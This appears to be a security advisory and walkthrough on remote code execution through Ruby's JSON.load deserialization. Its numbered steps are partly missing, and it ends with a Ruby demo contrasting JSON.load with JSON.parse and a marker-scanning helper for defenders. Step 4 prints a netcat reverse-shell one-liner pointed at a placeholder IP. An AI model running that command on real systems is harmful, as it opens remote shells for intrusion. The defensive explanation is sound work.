Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.
2. To import the library, fire up the Interactive Ruby Shell with the following command:
irb
4. Pick the desired payload; I have picked one from pentestmonkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f
It is recommended to use JSON.parse instead of JSON.load. In this case, we observed that JSON.load failed to validate the input data, which leads to Remote Code Execution.
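As an added example (not code from the advisory above), the following Ruby contrasts the two calls on the same document: with additions enabled, JSON.load instantiates whatever class the "json_class" key names, while JSON.parse returns plain data. The Greeting class, the UNTRUSTED document and the addition_markers helper are constructed for this demo and are assumptions, not part of the page; the helper goes slightly beyond the page by giving defenders a marker scan they can log or alert on.

```ruby
require 'json'

# Constructed class for demonstration: json_create is the hook the json
# gem's "additions" mechanism calls when a document carries a "json_class"
# key, so any class responding to it can be instantiated from input text.
class Greeting
  attr_reader :name

  def initialize(name)
    @name = name
  end

  def self.json_create(obj)
    new(obj['name'])
  end
end

# Constructed untrusted document: the "json_class" value selects the class.
UNTRUSTED = '{"json_class":"Greeting","name":"from untrusted input"}'

# Vulnerable pattern: JSON.load with additions enabled. Older json gem
# versions enable create_additions for JSON.load by default; it is passed
# explicitly here so the demo behaves the same on every version.
def load_unsafe(doc)
  JSON.load(doc, nil, create_additions: true)
end

# Recommended pattern: JSON.parse never instantiates classes, so
# "json_class" stays an ordinary string-valued key.
def parse_safe(doc)
  JSON.parse(doc)
end

# Defender check: walk parsed data and return the path of every object that
# carries the additions marker (JSON.create_id, "json_class" by default).
def addition_markers(value, path = '$', found = [])
  case value
  when Hash
    found << path if value.key?(JSON.create_id)
    value.each { |k, v| addition_markers(v, "#{path}.#{k}", found) }
  when Array
    value.each_with_index { |v, i| addition_markers(v, "#{path}[#{i}]", found) }
  end
  found
end
```

Calling load_unsafe(UNTRUSTED).class yields Greeting, whereas parse_safe(UNTRUSTED) is a Hash and addition_markers on it reports ["$"].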